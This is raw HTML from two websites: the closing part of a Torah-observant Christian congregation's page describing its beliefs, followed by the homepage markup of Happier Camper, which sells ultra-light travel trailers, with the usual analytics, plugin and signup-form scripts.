D3200&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1510254375&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;22&quot;,&quot;iso&quot;:&quot;6400&quot;,&quot;shutter_speed&quot;:&quot;0.000625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Olivet Hall Repainted" data-image-description="" data-medium-file="https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?fit=300%2C199" data-large-file="https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?fit=700%2C466" class="aligncenter size-large wp-image-1701" src="https://i2.wp.com/thewaybiblicalfellowship-com.stackstaging.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted-1024x681.jpg?resize=700%2C466" alt="" width="700" height="466" srcset="https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?resize=1024%2C681 1024w, https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?resize=300%2C199 300w, https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?resize=768%2C511 768w, https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?w=1400 1400w, https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?w=2100 2100w" sizes="(max-width: 700px) 100vw, 700px" data-recalc-dims="1" /></p> <p>&nbsp;</p> <p>&nbsp;</p> <p>We are a Sabbath observant congregation. We are also Torah observant and believe that the teaching and instruction (Torah) of God is His manual to living in His blessing.</p> <p>We are scripturally based, holding the Bible to be the ultimate source of truth.</p> <p>We follow Jesus Christ (Y&#8217;shua the Messiah) our Saviour, knowing that whoever keeps His word, in him, truly the love of God is perfected.</p> <p>Demonstrating our faith through obedience to God’s word believing everything laid down in the Torah and prophets; we believe that the commandments are a guardrail to protect us, not a fence to restrict us.</p> <p>We do not teach that we follow Torah FOR salvation; we follow it BECAUSE OF our salvation and faith in its Author.</p> </div> </div> </div> </article> </div> <div class="col-xs-12 col-md-4"> <div class="sidebar boxed push-down-30"> <div class="row"> <div class="col-xs-10 col-xs-offset-1"> </div> </div> </div> </div> </div> </div> <footer class="footer"> <div class="container"> <div class="row"> </div> </div> </footer> <footer class="copyrights"> <div class="container"> <div class="row"> <div class="col-xs-12 col-sm-6"> Readable WP theme &copy; Copyright 2014 </div> <div class="col-xs-12 col-sm-6"> <div class="copyrights--right"> Made by <a href="http://www.proteusthemes.com">ProteusThemes</a> </div> </div> </div> </div> </footer> </div><!-- /.page-content-container --> <div style="display:none"> </div> <!--[if lte IE 8]> <link rel='stylesheet' id='jetpack-carousel-ie8fix-css' href='http://thewaybiblicalfellowship.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel-ie8fix.css?ver=20121024' type='text/css' media='all' /> <![endif]--> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var ReadableVars = []; /* ]]> */ </script> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-content/themes/readable/assets/js/built.js?ver=1.4.3'></script> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-content/plugins/jetpack/_inc/build/spin.min.js?ver=1.3'></script> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-content/plugins/jetpack/_inc/build/jquery.spin.min.js?ver=1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"http:\/\/thewaybiblicalfellowship.com\/wp-admin\/admin-ajax.php","nonce":"1063a6d507","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/thewaybiblicalfellowship.com\/wp-login.php?redirect_to=http%3A%2F%2Fthewaybiblicalfellowship.com%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=20170209'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:6.5',blog:'68682675',post:'828',tz:'0',srv:'thewaybiblicalfellowship.com'} ]); _stq.push([ 'clickTrackerInit', '68682675', '828' ]); </script> <!-- W3TC-include-js-body-end --> </body> </html>
0
<!DOCTYPE html> <!--[if IE 8]> <html id="ie8" lang="en-US" prefix="og: http://ogp.me/ns#" > <![endif]--> <!--[if !(IE 8) ]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#" > <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width" /> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-M2XTHPW');</script> <!-- End Google Tag Manager --> <title>Happier Camper | Ultra-light Travel and Utility Trailers</title> <link rel="icon" href="https://happiercamper.com/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="https://happiercamper.com/favicon.ico" type="image/x-icon" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://happiercamper.com/xmlrpc.php" /> <!-- All in One SEO Pack Pro 2.11.1 by Michael Torbert of Semper Fi Web Design[709,772] --> <!-- Debug String: TUP26GU8IOA9FCLXHFXOTWXKBDW --> <link rel="canonical" href="https://happiercamper.com/" /> <meta property="og:title" content="Happier Camper" /> <meta property="og:type" content="website" /> <meta property="og:url" content="https://happiercamper.com/" /> <meta property="og:image" content="https://happiercamper.com/wp-content/plugins/all-in-one-seo-pack-pro/images/default-user-image.png" /> <meta property="og:site_name" content="Happier Camper" /> <meta property="og:description" content="Ultra-light Travel and Utility Trailers" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Happier Camper" /> <meta name="twitter:description" content="Ultra-light Travel and Utility Trailers" /> <meta name="twitter:image" content="https://happiercamper.com/wp-content/plugins/all-in-one-seo-pack-pro/images/default-user-image.png" /> <meta itemprop="image" content="https://happiercamper.com/wp-content/plugins/all-in-one-seo-pack-pro/images/default-user-image.png" /> <script type="text/javascript" > window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; ga('create', 'UA-59971024', 'auto'); // Plugins ga('send', 'pageview'); </script> <script async src="https://www.google-analytics.com/analytics.js"></script> <!-- /all in one seo pack pro --> <link rel='dns-prefetch' href='//cdn.rawgit.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Happier Camper &raquo; Feed" href="https://happiercamper.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Happier Camper &raquo; Comments Feed" href="https://happiercamper.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/happiercamper.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://happiercamper.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='style-css' href='https://happiercamper.com/wp-content/themes/Happier%20Camper/style.css?ver=4.9.10' type='text/css' media='all' /> <!--n2css--><script type='text/javascript' src='https://happiercamper.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://happiercamper.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://happiercamper.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.1'></script> <script type='text/javascript' src='https://happiercamper.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.1'></script> <script type='text/javascript' src='https://happiercamper.com/wp-content/themes/Happier%20Camper/js/bootstrap.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://happiercamper.com/wp-content/themes/Happier%20Camper/js/custom.js?ver=4.9.10'></script> <script type='text/javascript' src='https://cdn.rawgit.com/jrue/Vimeo-jQuery-API/master/dist/jquery.vimeo.api.min.js?ver=4.9.10'></script> <link rel='https://api.w.org/' href='https://happiercamper.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://happiercamper.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://happiercamper.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel='shortlink' href='https://happiercamper.com/' /> <link rel="alternate" type="application/json+oembed" href="https://happiercamper.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhappiercamper.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://happiercamper.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhappiercamper.com%2F&#038;format=xml" /> <meta name="generator" content="Powered by Slider Revolution 5.4.8.1 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <script type="text/javascript">function setREVStartSize(e){ try{ e.c=jQuery(e.c);var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0; if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f}) }catch(d){console.log("Failure at Presize of Slider:"+d)} };</script> <!--[if lt IE 9]> <script src="https://happiercamper.com/wp-content/themes/Happier%20Camper/js/html5.js" type="text/javascript"></script> <![endif]--> </head> <body class="home page-template page-template-home page-template-home-php page page-id-74"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-M2XTHPW" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div id="main-navigation-wrapper"> <nav role="navigation" id="main-navigation" class="site-navigation"> <h1 class="assistive-text">Menu</h1> <div class="assistive-text skip-link"><a href="#content" title="Skip to content">Skip to content</a></div> <div class="menu-primary-menu-container"><ul id="menu-primary-menu" class="menu nolist"><li id="menu-item-3505" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-74 current_page_item menu-item-3505"><a href="https://happiercamper.com/">Home</a></li> <li id="menu-item-3503" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3503"><a href="https://happiercamper.com/hc1-travel-trailer/">HC1 Travel-Trailer</a></li> <li id="menu-item-3497" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3497"><a href="https://happiercamper.com/adaptiv/">Adaptiv™ System</a></li> <li id="menu-item-3498" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3498"><a href="https://happiercamper.com/add-ons/">Add-Ons</a></li> <li id="menu-item-3507" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3507"><a href="https://happiercamper.com/media-gallery/">Photos/Videos</a></li> <li id="menu-item-3506" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3506"><a href="https://happiercamper.com/order/">How To Order</a></li> <li id="menu-item-3502" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3502"><a href="https://happiercamper.com/faq/">FAQ</a></li> <li id="menu-item-3500" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3500"><a href="https://happiercamper.com/contact/">Contact</a></li> </ul></div> <ul id="socicons" class="nolist nopad"> <li><a href="https://www.facebook.com/happiercamper" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/facebook.png" alt="Facebook" width="32" height="32"></a></li> <li><a href="https://twitter.com/HappierCampers/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/twitter.png" alt="Twitter" width="32" height="32"></a></li> <li><a href="https://www.pinterest.com/happiercampers/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/pinterest.png" alt="Pinterest" width="32" height="32"></a></li> <li><a href="https://instagram.com/happiercamper/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/instagram.png" alt="Instagram" width="32" height="32"></a></li> <li><a href="http://happiercamper.tumblr.com/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/tumblr.png" alt="Tumblr" width="32" height="32"></a></li> </ul> <!-- #socicons --> <!-- <div id="menu-buy"> <a href="https://happiercamper.com/order" class="btn cream upper bgbl">ORDER THE HC1</a> </div> --> <!-- #menu-buy --> <div id="menu-brochure" class="bgl"><br><br> <br /><u>Downloads</u><br /> <a href="/wp-content/themes/Happier%20Camper/pdfs/happier-camper-brochure.pdf" target="_blank"> <span class="glyphicon glyphicon-download-alt" aria-hidden="true"></span> Brochure</a><br /> <a href="/wp-content/themes/Happier%20Camper/pdfs/happier-camper-manual.pdf" target="_blank"> <span class="glyphicon glyphicon-download-alt" aria-hidden="true"></span> Owner's Manual</a><br /> <a href="/wp-content/themes/Happier%20Camper/pdfs/happier-camper-adaptiv.pdf" target="_blank"> <span class="glyphicon glyphicon-download-alt" aria-hidden="true"></span> Adaptivâ„¢</a><br /> <a href="http://happiercamper.com/wp-content/themes/Happier%20Camper/pdfs/preparing-for-camping-2018.pdf" target="_blank"> <span class="glyphicon glyphicon-download-alt" aria-hidden="true"></span> Camping Tips</a> <!-- <a href="/wp-content/themes/Happier%20Camper/pdfs/happier-camper-price-sheet.pdf" target="_blank"> <span class="glyphicon glyphicon-download-alt" aria-hidden="true"></span> Price Sheet</a> --> </div> <!-- #menu-brochure --> </nav><!-- .site-navigation .main-navigation --> <div id="main-navigation-border"> </div> <!-- #main-navigation-border --> </div> <!-- #main-navigation-wrapper --> <div id="hero-video" class="hidden"> <a id="close-video" class="close_btn" role="button"> <div class="toggle-icon"> <span class="bar"></span> <span class="bar"></span> </div> <!-- .toggle-icon --> </a> <iframe id="iframe-video" src="//player.vimeo.com/video/221023512?autoplay=0&amp;byline=0&amp;title=0&amp;badge=0&amp;portrait=0&amp;" width="100%" height="100%" frameborder="0" webkitallowfullscreen="" mozallowfullscreen="" allowfullscreen=""></iframe> </div> <!-- #hero-video --> <div id="mainNavTrigger" class="push"> <span class="title">MENU</span> <div class="toggle-icon"> <span class="bar"></span> <span class="bar"></span> <span class="bar"></span> </div> <!-- .toggle-icon --> </div> <!-- #mainNavTrigger --> <ul id="socicons" class="nolist nopad hidden-xs"> <li><a href="https://www.facebook.com/happiercamper?_rdr/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/facebook.png" alt="Facebook" width="32" height="32"></a></li> <li><a href="https://twitter.com/HappierCampers/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/twitter.png" alt="Twitter" width="32" height="32"></a></li> <li><a href="https://www.pinterest.com/happiercampers/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/pinterest.png" alt="Pinterest" width="32" height="32"></a></li> <li><a href="https://instagram.com/happiercamper/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/instagram.png" alt="Instagram" width="32" height="32"></a></li> <li><a href="http://happiercamper.tumblr.com/" target="_blank"><img class="socicon" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/tumblr.png" alt="Tumblr" width="32" height="32"></a></li> </ul> <!-- #socicons --> <section id="primary"> <div class="container-fluid clearfix"> <div class="row"> <div class="col-sm-12"> <header id="masthead" class="site-header" role="banner"> <div class="container-fluid clearfix"> <div class="row"> <div class="col-md-12"> <a href="https://happiercamper.com/" title="Happier Camper" rel="home"><img class="logo" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/logo-main.png" alt="Logo" height="45" width="405"></a> </div> <!-- .col-md-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </header> <!-- #masthead --> </div> <!-- .col-sm-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> <h2 id="landing-cta" class="upper ftcream bgbl ftsz50 wings center">Available Now</h2> <button class="trans upper bgbl" id="videoTrigger">WATCH THE VIDEO</button> <div class="col-sm-4 brochure upper bgbl"> <a href="/wp-content/themes/Happier%20Camper/pdfs/happier-camper-brochure.pdf" target="_blank"><span>Download</span> <img class="logo" alt="Logo" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/logo-small-brown.png" width="60" height="46"> <span>Brochure</span></a> </div> <!-- .brochure --> </section> <!-- #primary --> <div id="page" class="hfeed site"> <div class="section-break pad40nil hideme"> <div class="container clearfix"> <div class="row"> <div class="col-sm-12"> <h2 class="section-title upper bgm"> <img class="hidden-xs" src="https://happiercamper.com/wp-content/themes/Happier%20Camper/images/logo-small-blue-knocked.png" alt="Logo"> ULTRA-LIGHT TRAVEL AND UTILITY TRAILER</h2> </div> <!-- .col-sm-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </div> <section id="secondary"> <div class="container clearfix hideme"> <div class="row"> <div class="col-sm-12"> <h1 class="section-title upper ftcream bgbl ftsz50">big Heart,<br />Little Trailer</h1> </div> <!-- .col-sm-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </section> <!-- #secondary --> <div class="section-break pad40nil hideme"> <div class="container clearfix"> <div class="row"> <div class="col-lg-8 col-lg-offset-2"> <h2 class="section-title bgl">Retro-modern at heart, delivering affordable adventure and ground-breaking flexibility in an ultra-light package.</h2> <!-- <h3 class="section-title bgb"><a href="https://happiercamper.com/the-trailer">- Read More -</a></h3> --> </div> <!-- .col-lg-8 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </div> <section id="tertiary"> <div class="container clearfix"> <div class="row"> <div class="col-sm-12"> <a href="https://happiercamper.com/the-trailer"><h2 class="section-title upper ftcream bgbl ftsz50 wings hideme">The Trailer</h2></a> </div> <!-- .col-sm-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </section> <!-- #tertiary --> <section id="quaternary"> <div class="row clearfix"> <a href="https://happiercamper.com/features"> <div class="col-sm-6 nopad hidden-xs"> <div class="homepage-thumb-large" style="background-image: url('https://happiercamper.com/wp-content/uploads/2018/12/features-featured.jpg')" ></div> </div> <!-- .col-sm-6 --> <div class="col-sm-6 page-info"> <h2 class="section-title upper ftcream bgbl ftsz50 wings hideme">HC1 Travel-Trailer</h2> <div class="hideme">The HC1 is the result of a lifetime of enthusiasm and five years of careful design. An Adaptiv™ interior comes standard along with features like a huge rear hatch, wide entry door, classic wheel fenders, honeycomb fiberglass floor, and large panoramic windows. <span class="bgm">Learn More</span></div> </div> <!-- .col-sm-6 --> </a> </div> <!-- .clearfix --> <div class="row clearfix"> <a href="https://happiercamper.com/adaptiv"> <div class="col-sm-6 page-info"> <h2 class="section-title upper ftcream bgbl ftsz50 wings hideme">Adaptiv™</h2> <div class="hideme">Our highly flexible Adaptiv™ modular interior system allows you to easily customize your trailer on-the-fly to suit a variety of needs. From camping, to hauling, to guest quarters, create the layout you want in just minutes. Configuring and reconfiguring is a snap, and the possibilities are limitless. We have reimagined what is possible with an ultra-light. <span class="bgm">Learn More</span></div> </div> <!-- .col-sm-6 --> <div class="col-sm-6 nopad hidden-xs"> <div class="homepage-thumb-large"> <iframe src="https://player.vimeo.com/video/123978073?color=f8efea&title=0&byline=0&portrait=0" width="100%" height="100%" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe> </div> <!-- #homepage-thumb-large --> </div> <!-- .col-sm-6 --> </a> </div> <!-- .clearfix --> <div class="row clearfix"> <a href="https://happiercamper.com/add-ons"> <div class="col-sm-6 nopad hidden-xs"> <div class="homepage-thumb-large" style="background-image: url('https://happiercamper.com/wp-content/uploads/2018/12/happier-camper-tertiary-bg-copy1.jpg')" ></div> </div> <!-- .col-sm-6 --> <div class="col-sm-6 page-info"> <h2 class="section-title upper ftcream bgbl ftsz50 wings hideme">Add-Ons</h2> <div class="hideme">At Happier Camper we have put many camping and trailer accessories to the test. Based on personal use and customer feedback, we’ve hand-selected an array of compatible accessories and upgrades that enrich or extend the HC1 experience. <span class="bgm">Learn More</span></div> </div> <!-- .col-sm-6 --> </a> </div> <!-- .clearfix --> </section> <!-- #quaternary --> <div class="section-break pad40nil hideme"> <div class="container clearfix"> <div class="row"> <div class="col-md-6 col-md-offset-3"> <a href="https://happiercamper.com/order" class="btn trans-blue upper bgbl ftsz50">HOW TO ORDER</a> </div> <!-- .col-sm-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </div> <section id="quinary"> <div class="container clearfix"> <div class="row"> <div class="col-sm-12"> <div class="row"> <div class="col-sm-6 page-info"> <h2 class="section-title upper ftcream bgbl ftsz50 hideme">Media Gallery</h2> <h3 class="section-title upper ftcream bgm wings pullup2h2 hideme">Video & Pics</h3> <div class="row"> <div class="col-sm-4 col-sm-offset-2"> <img src="https://happiercamper.com/wp-content/uploads/2015/04/video-thumb-1.jpg" alt="video-thumb-1" width="400" height="267" class="alignnone size-full wp-image-263" /> <a href="/media-gallery#videos" class="btn trans upper bgl">Videos</a> </div> <div class="col-sm-4"> <img src="https://happiercamper.com/wp-content/uploads/2015/04/video-thumb-2.jpg" alt="video-thumb-2" width="400" height="267" class="alignnone size-full wp-image-264" /> <a href="/media-gallery#photos" class="btn trans upper bgl">Photos</a> </div> </div> <div class="row"> <div class="col-sm-4 col-sm-offset-2"> <img src="https://happiercamper.com/wp-content/uploads/2015/04/video-thumb-3.jpg" alt="video-thumb-3" width="400" height="268" class="alignnone size-full wp-image-265" /> <a href="/media-gallery#press" class="btn trans upper bgl">Press</a> </div> <div class="col-sm-4"> <img src="https://happiercamper.com/wp-content/uploads/2015/04/vr-preview.jpg" alt="video-thumb-3" width="400" height="268" class="alignnone size-full wp-image-265" /> <a href="https://happiercamper.com/vr-360-tour-of-configurations/" class="btn trans upper bgl">VR/360 tours</a> </div> </div> </div> <!-- .col-sm-6 --> </div> <!-- .row --> </div> <!-- .col-sm-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </section> <!-- #quinary --> <section id="senary"> <div class="container clearfix"> <div class="row"> <div class="col-sm-12"> <div class="row"> <div class="col-sm-6 col-sm-offset-6 page-info hideme"> <h2 class="section-title upper ftcream bgbl ftsz50">JOIN OUR MAILING LIST</h2> <!-- <h3 class="section-title upper ftcream bgbl wings pullup2h2">KEEP ME POSTED</h3> --> </div> <!-- .col-sm-6 --> <div class="col-sm-6 col-sm-offset-6 absolute bottom80"> <div id="mc_embed_signup"> <form action="//happiercamper.us8.list-manage.com/subscribe/post?u=f7f756a9375e93d161d1ce9dc&amp;id=c3b235558d" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate> <div id="mc_embed_signup_scroll"> <div class="form-group hideme"> <input type="email" placeholder="Email Address" name="EMAIL" class="col-sm-12" id="mce-EMAIL"> </div> <!-- .form-group --> <div class="form-group hideme"> <input type="text" placeholder="First Name" name="FNAME" class="col-sm-12" id="mce-FNAME"> </div> <!-- .form-group --> <div class="form-group hideme"> <input type="text" placeholder="Last Name" name="LNAME" class="col-sm-12" id="mce-LNAME"> </div> <!-- .form-group --> <div id="responses" class="clearfix"> <div class="response ftcream" id="mce-error-response" style="display:none"></div> <div class="response ftcream" id="mce-success-response" style="display:none"></div> </div> <!-- #responses --> <div style="position: absolute; left: -5000px;"> <input type="text" name="b_f7f756a9375e93d161d1ce9dc_e5c7e5f604" tabindex="-1" value=""> </div> <div class="clearfix hideme"> <input class="col-sm-12 upper" type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="trans"> </div> <!-- .clearfix --> </div> <!-- #mc_embed_signup_scroll --> </form> <!-- #e5c7e5f604 --> </div> <!-- #mc_embed_signup --> <script src='//s3.amazonaws.com/downloads.mailchimp.com/js/mc-validate.js'></script><script type='text/javascript'>(function($) {window.fnames = new Array(); window.ftypes = new Array();fnames[0]='EMAIL';ftypes[0]='email';fnames[1]='FNAME';ftypes[1]='text';fnames[2]='LNAME';ftypes[2]='text';}(jQuery));var $mcj = jQuery.noConflict(true);</script> </div> <!-- .row --> </div> <!-- .col-sm-12 --> </div> <!-- .row --> </div> <!-- .container .clearfix --> </section> <!-- #senary --> <footer id="colophon" class="row" role="contentinfo"> <div class="col-sm-4 rentals"> <a href="http://happierrentals.com" 